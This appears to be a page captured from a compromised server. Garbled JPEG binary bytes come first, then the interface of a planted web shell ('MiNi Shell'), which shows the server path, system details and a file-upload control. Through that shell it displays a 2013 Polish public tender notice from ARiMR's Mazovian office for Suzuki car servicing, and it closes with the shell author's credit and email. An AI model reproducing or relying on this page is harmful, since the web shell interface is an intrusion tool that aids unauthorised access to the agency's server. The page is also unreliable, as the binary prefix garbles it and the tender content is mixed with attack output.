JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/69264-N-2013.html

<p class="kh_header"><b>Warszawa: ŚWIADCZENIE USŁUG PRZEGLĄDÓW, NAPRAW I KONSERWACJI SAMOCHODÓW MARKI SUZUKI  EKSPLOATOWANYCH W MAZOWIECKIM ODDZIALE REGIONALNYM ARIMR</b><br>
<b>Numer ogłoszenia: 69264 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny , ul. Jana Pawła II 70, 00-175 Warszawa, woj. mazowieckie, tel. 22 5365705-06, faks 22 8602842.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRZEGLĄDÓW, NAPRAW I KONSERWACJI SAMOCHODÓW MARKI SUZUKI  EKSPLOATOWANYCH W MAZOWIECKIM ODDZIALE REGIONALNYM ARIMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług pogwarancyjnych przeglądów, napraw i konserwacji samochodów marki SUZUKI, eksploatowanych w Mazowieckim Oddziale Regionalnym ARiMR, wynikających z awarii technicznych, przeglądów okresowych zgodnych z ustalonymi przez producenta warunkami eksploatacji.
Szczegółowy wykaz samochodów, których dotyczy przedmiotowe zamówienie zawiera Załącznik nr 1 do wzoru umowy/umowy. Wzór umowy stanowi Załącznik nr 6 do SIWZ.
2. Zakres usług obejmuje:
1) wykonywanie przeglądów okresowych, 
2) wykonywanie napraw wynikających z przeglądów,
3) wykonywanie napraw bieżących wynikłych w czasie eksploatacji, 
4) wykonywanie bieżących konserwacji,
5) diagnostykę w tym serwis ogumienia polegający na kontroli zużycia ogumienia, 
6) demontaż zużytych części, akcesoriów i materiałów wynikających z napraw oraz ich utylizację,
7) dostawę i w razie potrzeby wymianę niezbędnych części zamiennych, podzespołów, materiałów eksploatacyjnych i gumowych.
3. Przeglądy będą wykonywane zgodnie z częstotliwością i zakresem wynikającym 
z WARUNKÓW EKSPLOATACJI I PRZEGLĄDÓW OKRESOWYCH dla danego samochodu. 
4. Naprawy będą wykonywane zgodnie z zakresem, każdorazowo określanym przez pracownika Zamawiającego, który dostarczy samochód do stacji obsługi. 
5. Przeglądy i naprawy poszczególnych samochodów będą wykonywane w terminach uzgodnionych każdorazowo przez strony, przy czym termin przyjęcia samochodu na przegląd lub naprawę nie może być dłuższy niż dwa dni od daty zgłoszenia przez Zamawiającego takiej potrzeby.
6. Odbiór samochodu od Zamawiającego przez Wykonawcę każdorazowo zostanie potwierdzony w dokumencie ZLECENIE USŁUGI który zostanie wydany Zamawiającemu. W dokumencie tym strony określają termin wykonania usługi. W przypadku braku możliwości określenia terminu wykonania usługi w dniu odbioru samochodu od Zamawiającego przez Wykonawcę, strony niezwłocznie określą termin wykonania usługi, nie później jednak niż w ciągu 2 dni od dnia przekazania samochodu przez Zamawiającego Wykonawcy. 
7. Zamawiający wymaga, aby naprawy, przeglądy i konserwacje (oraz inne usługi wymienione w ust. 2 rozdz. III SIWZ) wykonywane były w stacji obsługi, do której dojazd nie przekracza 12 km od siedziby Zamawiającego w Warszawie przy Al. Jana Pawła II 70, wg licznika tras optymalnych na stronie internetowej www.targeo.pl.
8. Jeżeli po stronie Zamawiającego będzie taka potrzeba, Zamawiający zleci telefonicznie lub faksem lub poprzez osobę reprezentującą Zamawiającego, aby samochód będący przedmiotem usługi, został (na koszt Wykonawcy) umyty i posprzątany przez Wykonawcę po wykonaniu usługi.
9. W razie konieczności holowania pojazdu Wykonawca dokona nieodpłatnie usługi holowania z miejsca wskazanego przez pracownika Zamawiającego /w obrębie woj. mazowieckiego/ do stacji obsługi Wykonawcy niezwłocznie lub w innym terminie po ustaleniu z pracownikiem Zamawiającego, z zastrzeżeniem ust. 11 rozdziału III SIWZ.
10. Obowiązkiem Wykonawcy będzie:
a) wykonywanie przeglądów, napraw i konserwacji (oraz innych usług, o których mowa w rozdziale III SIWZ) w terminach uzgodnionych z Zamawiającym oraz wynikających z SIWZ,
b) w przypadku, gdy naprawa będzie trwała dłużej niż 2 dni, bezpłatne zapewnienie na zlecenie Zamawiającego samochodu zastępczego o porównywalnych parametrach użytkowych z pełnym zbiornikiem paliwa, który Zamawiający zwróci z pełnym zbiornikiem paliwa po zakończeniu naprawy, z zastrzeżeniem ust. 11  rozdziału III SIWZ.
c) stosowanie przy przeglądach, naprawach i konserwacjach fabrycznie nowych - zalecanych przez producenta samochodu - części zamiennych, podzespołów i materiałów,
d) wyszczególnianie na wystawianych przez Wykonawcę fakturach VAT: numeru rejestracyjnego samochodu, ceny i ilości roboczogodzin dla wszystkich wykonywanych czynności, które obejmuje faktura oraz ilości użytych do dokonania naprawy lub przeglądu części zamiennych, podzespołów, materiałów eksploatacyjnych i gumowych wraz z ich wartością, według aktualnego cennika i wysokością udzielonego na nie upustu.
11. W razie konieczności holowania pojazdu o nr rejestracyjnym WI 6830N Wykonawca dokona niezwłocznie i nieodpłatnie usługi holowania z miejsca wskazanego przez pracownika Zamawiającego /w obrębie woj. mazowieckiego/ do stacji obsługi Wykonawcy oraz zapewni samochód zastępczy o porównywalnych parametrach użytkowych z pełnym zbiornikiem paliwa, który Zamawiający zwróci z pełnym zbiornikiem paliwa po zakończeniu naprawy. 
Samochód zastępczy, o którym mowa w niniejszym ustępie, powinien być dostarczony na miejsce awarii pojazdu o nr rejestracyjnym WI 6830N niezwłocznie na lawecie, sprawny i przygotowany do jazdy, w celu umożliwienia kontynuowania podróży pracownikowi Zamawiającego.
12. Wszystkie ceny części zamiennych, podzespołów, materiałów eksploatacyjnych i gumowych oraz innych środków niezbędnych do wykonania usług będących przedmiotem umowy, wyszczególnione w wystawianych przez Wykonawcę fakturach, muszą być zgodne z aktualnie obowiązującymi u Wykonawcy cennikami. Ponadto Wykonawca na żądanie Zamawiającego i w wyznaczonym przez Zamawiającego terminie zobowiązany będzie do udostępnienia mu do wglądu aktualnie obowiązujących cenników części zamiennych, podzespołów, materiałów eksploatacyjnych i gumowych i innych środków użytych do wykonania usług będących przedmiotem zamówienia.
13. Zamawiający wymaga, aby czas trwania wszystkich napraw, przeglądów i konserwacji, wyszczególniony w wystawianych przez Wykonawcę fakturach, był zgodny z normami czasowymi określonymi w katalogu/ach norm czasowych aktualnie obowiązującym/ych u Wykonawcy dla danego modelu samochodu. Ponadto Wykonawca na żądanie Zamawiającego i w wyznaczonym przez Zamawiającego terminie zobowiązany będzie do udostępnienia mu do wglądu aktualnie obowiązujący/e katalog/i norm czasowych, jakim/i się on posługuje przy realizacji niniejszego zamówienia ( np. AUTODATA lub inny).
14. Realizowany przez Wykonawcę przedmiot umowy musi spełniać wymagania określone przepisami polskimi oraz normami europejskimi obowiązującymi w tym zakresie.
15. Z uwagi na zapisy § 3 ust. 3 Załącznika nr 6 do SIWZ Zamawiający zaleca, aby Wykonawca dysponował ogrodzonym parkingiem przy stacji obsługi Wykonawcy w celu prawidłowego zabezpieczenia pojazdów Zamawiającego.
16. Opis sposobu ustalenia wartości niniejszego zamówienia przez Zamawiającego.
Zamawiający ustalił wartość nin. zamówienia na podstawie:
a) Przeglądy będą wykonywane zgodnie z częstotliwością i zakresem wynikającym z WARUNKÓW EKSPLOATACJI I PRZEGLĄDÓW OKRESOWYCH dla danego samochodu. (przy założeniu na potrzeby ustalenia wartości nin. zamówienia maksymalnej potrzeby dotyczącej wymiany część wynikającej z każdego przeglądu), z zastrzeżeniem ust. 4 rozdziału III SIWZ.
b) Ilość roboczogodzin niezbędnych do wykonywania nin. zamówienia, przyjęta przez Zamawiającego do ustalenia wartości nin. zamówienia, wynosi 440 rb/g.
17. Szczegółowy zakres i warunki świadczenia usług przeglądów, napraw i konserwacji samochodów marki SUZUKI eksploatowanych w Mazowieckim Oddziale Regionalnym ARiMR zostały określone we wzorze umowy stanowiącym Załącznik nr 6 do SIWZ.
18. Wartością umowy, określoną w § 5 ust. 1 umowy, będzie kwota, którą Zamawiający zamierza przeznaczyć na realizację zamówienia, podana przez Zamawiającego bezpośrednio przed otwarciem ofert..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postepowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje: co najmniej 2 (dwie) usługi napraw samochodów, w zakresie, o którym mowa w ust. 2 rozdz. III SIWZ, o wartości co najmniej 70 000 PLN brutto każda (słownie: siedemdziesiąt tysięcy złotych 00/100), oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje narzędziami, wyposażeniem zakładu i urządzeniami technicznymi, dostępnymi Wykonawcy, niezbędnymi do realizacji zamówienia, w szczególności: 
- co najmniej jedną auto lawetą (w celu realizacji zlecenia holowania), 
- co najmniej jedną ścieżką diagnostyczną, 
- co najmniej jednym urządzeniem do wykonania geometrii kół,
- min. czterema podnośnikami,
- min. jednym stanowiskiem elektryka samochodowego,
- urządzeniem i aplikacją do pełnej diagnostyki usterki, obsługującej oprogramowanie SUZUKI,
wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postepowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca, wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 150 000,00 PLN (słownie: sto pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony formularz ofertowy (według Załącznika nr 1 do SIWZ);
b) dokument, o którym mowa w rozdziale V ust. 6 SIWZ, jeśli Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów (oryginał);
c) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, jeżeli nie wynika ono z odpisu z właściwego rejestru w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa lub notarialnie. 
W przypadku, jeśli pełnomocnictwo wynika z umowy spółki cywilnej, Wykonawca dołączy odpowiedni dokument, który będzie to potwierdzał.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Oferowany upust od obowiazującej w dniu wykonania usługi i stosowanej cennikowej ceny części zamiennych, podzespołów, mat. eksploatacyjnych i gumowych - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w trybie art. 144 ust.1 ustawy Pzp  w następujących przypadkach:
1) W przypadku korzystania przez Wykonawcę z podwykonawców, zmiana podwykonawcy będzie wymagała zmiany umowy w formie pisemnej.
2) W przypadku zwiększenia lub zmniejszenia stawek podatku od towarów i usług dotyczących przedmiotu zamówienia, w wyniku zmiany Ustawy o podatku od towarów i usług, wynagrodzenie Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek ww. podatku ulega zmianie kwota podatku i wynagrodzenia Wykonawcy. Zmiana ta wymaga formy pisemnej. 
3) Zamawiający zastrzega sobie prawo do zmiany w wykazie samochodów, stanowiącym Załącznik nr 1 do umowy (zawartej na podstawie Załącznika nr 6 do SIWZ - wzoru umowy), w tym zmiany ilości samochodów objętych przeglądami i naprawami (w przypadku, jeśli po stronie Zamawiającego zaistnieje taka potrzeba). Zmodyfikowany wykaz zostanie przedstawiony Wykonawcy w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Mazowiecki Oddział Regionalny, Al. Jana Pawła II 70, 00-175 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Mazowiecki Oddział Regionalny, Al. Jana Pawła II 70, 00-175 Warszawa - Kancelaria (pokój nr 241, II pietro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO 
Z WYKONAWCAMI ORAZ PRZEKAZYWANIA OŚWIADCZEŃ I DOKUMENTÓW ORAZ WSKAZANIE OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ 
Z WYKONAWCAMI:
1. Wszelkie oświadczenia, wnioski, zawiadomienia, wyjaśnienia oraz informacje Zamawiający i Wykonawcy mogą przekazywać:
- pisemnie na adres:
AGENCJA RESTRUKTURYZACJI I MODERNIZACJI ROLNICTWA
MAZOWIECKI ODDZIAŁ REGIONALNY
Al. Jana Pawła II 70, 00-175 Warszawa
[korespondencję dostarczaną osobiście lub za pośrednictwem kuriera należy złożyć również pod wyżej wskazany adres (kancelaria pok. 241)].
- faxem na numer (22) 860 28 42,
z zastrzeżeniem ust. 2 rozdz. VII SIWZ.
2. Forma pisemna - jako jedyna dopuszczalna - zastrzeżona jest dla:
- złożenia oferty wraz z załącznikami, 
- złożenia dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp, składanych zarówno jako załączniki do oferty, jak i w odpowiedzi na wezwanie Zamawiającego do uzupełnienia dokumentów,
- zmiany lub wycofania oferty.
3. Jeżeli Zamawiający lub Wykonawca przekazują dokumenty lub informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
4. Osobami uprawnionymi do kontaktów z Wykonawcami są:
- Magdalena Nasiłowska - w sprawie procedury przetargowej 
Tel (22) 536 58 47 w godzinach: od 7.30 do 15.30,
- Andrzej Pokraśniewicz - w sprawie procedury przetargowej 
Tel. (22) 536 58 21 w godzinach: od 7.00 do 15.00,
- Waldemar Kiszka - w sprawach przedmiotu zamówienia 
Tel. (22) 536 59 47, kom. 661 781 387, w godzinach: od 7.30 do 15.30..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com